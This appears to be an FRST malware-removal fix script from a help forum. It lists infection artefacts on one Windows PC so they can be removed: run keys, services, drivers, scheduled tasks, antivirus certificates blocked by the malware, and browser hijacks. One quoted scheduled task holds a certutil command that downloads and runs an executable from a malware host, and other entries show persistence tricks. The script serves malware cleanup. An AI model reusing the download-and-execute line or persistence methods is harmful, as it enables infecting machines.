HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot) <==== ACHTUNG
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG) <==== ACHTUNG
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) <==== ACHTUNG
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) <==== ACHTUNG
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) <==== ACHTUNG
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) <==== ACHTUNG
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) <==== ACHTUNG
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) <==== ACHTUNG
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) <==== ACHTUNG
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) <==== ACHTUNG
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) <==== ACHTUNG
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) <==== ACHTUNG
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) <==== ACHTUNG
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) <==== ACHTUNG
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) <==== ACHTUNG
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) <==== ACHTUNG
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) <==== ACHTUNG
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [muV82mBJud.exe] => C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69\muV82mBJud.exe [394240 2018-05-27] ()
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PLRFCKFE44692QO] => "C:\Program Files\RDH9TH3UTU\RDH9TH3UT.exe"
C:\Program Files\RDH9TH3UTU
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [2196509] => "C:\Users\Nico\AppData\Roaming\okdd3kogot1\xc1a5n52rpd.exe" /VERYSILENT
C:\Users\Nico\AppData\Roaming\okdd3kogot1
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [A4UX3F695ZAIC7C] => "C:\Program Files (x86)\eu0vb4pykb5\7CSH7.exe"
C:\Program Files (x86)\eu0vb4pykb5
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [flosdx] => rundll32.exe "C:\Users\Nico\AppData\Local\pfialx.dll",flosdx <==== ACHTUNG
C:\Users\Nico\AppData\Local\pfialx.dll
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [KDY06ILDW1UEHVJ] => "C:\Program Files\I88TDHYW3R\I88TDHYW3.exe"
C:\Program Files\I88TDHYW3R
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [PatientSunset] => C:\Windows\rss\csrss.exe [3188736 2018-05-27] () <==== ACHTUNG
C:\Windows\rss\csrss.exe
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [QIJFFKRURZ.exe] => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\QIJFFKRURZ.exe
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\Run: [CloudNet] => C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [680960 2018-05-28] (EpicNet Inc.)
C:\Users\Nico\AppData\Roaming\EpicNet Inc
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\...\MountPoints2: {21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} - E:\HiSuiteDownLoader.exe
ShellExecuteHooks: Kein Name - {BFD98515-CD74-48A4-98E2-13D209E3EE4F} - C:\Windows\System32\mcicda64.dll [2990080 2018-03-24] ()
GroupPolicy: Beschränkung - Chrome <==== ACHTUNG
CHR HKLM\SOFTWARE\Policies\Google: Beschränkung <==== ACHTUNG
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.de/?gws_rd=ssl
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> DefaultScope {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://www.wupuf.com/?f=4&a=wbf_coinisre_18_21_18&cd=2XzuyEtN2Y1L1QzutCtD0CtAyB0ByC0FyDzyyEtDtCtB0AtAtN0D0Tzu0StBtAtAzztN1L2XzuyEtFtByEtFtDtFzyzytN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StAyByE0EtAyC0FyEtGyBtAtDzytGyBtA0EtCtGyEtDtBtDtG0D0FtD0BtD0CtDyCzz0BtA0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2S1StBzzzy1PtAyB1TtG1StA1Q1TtGyE1RtCtCtG1SzyyD1StG1O1QzyzzzytAzytDtB1S1PyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCyByEtAyBtN1Q2Z1B1P1RzutCyDtByByEtDyEtCzzzz&cr=1152795906&ir=&uref=IE&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1284053026-2775073283-1402561352-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBEQo0lOCwIxrzs2Rcb6iYjVCj8u5pZAYR_NMACZ47ScJsQGE39jykuD2WnJ1E7peK7cClVnHFQkR5aLl37ImBi3McF46qp-NOIPW9gamzMaq2aAAyyo3_uEnB4H5cMWr86s9Jy1OcZjHDLXwgHhSfI3nHRjy4zqrr_k5gq5KL9J3hBmCAOIW0Uz6ffFL4,&q={searchTerms}
FF HKLM\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}
FF Extension: ( ) - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi [2018-05-27]
FF HKLM-x32\...\Firefox\Extensions: [{2DE791A8-8C99-44DF-9976-CEACCA8FE024}] - C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-05-27]
R2 backlh; C:\ProgramData\Logic Cramble\set.exe [3780096 2018-05-27] () [Datei ist nicht signiert] <==== ACHTUNG
C:\ProgramData\Logic Cramble
R2 MicroService; C:\Users\Nico\AppData\Local\XService\XService.dll [585216 2018-05-27] () [Datei ist nicht signiert]
C:\Users\Nico\AppData\Local\XService
S3 SystemUpdate64; C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [593920 2018-05-27] (SystemaRev) [Datei ist nicht signiert]
C:\Program Files\SystemaRev
R2 winamgr; C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe [10644480 2018-05-28] (Microsoft Corporation) [Datei ist nicht signiert] <==== ACHTUNG
R2 WinDefender; C:\Windows\windefender.exe [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
Unlock: C:\Windows\windefender.exe
C:\Windows\windefender.exe
R2 848d0b10145f615d9a5315f9c7921103; rundll32.exe C:\Windows\qcusolizqbhuglpw.qcus QEl [X]
C:\Windows\qcusolizqbhuglpw.qcus
S3 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [X]
S2 Nettrans; C:\ProgramData\PrefsSecure\Nettrans.exe [X] <==== ACHTUNG
C:\ProgramData\PrefsSecure
S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

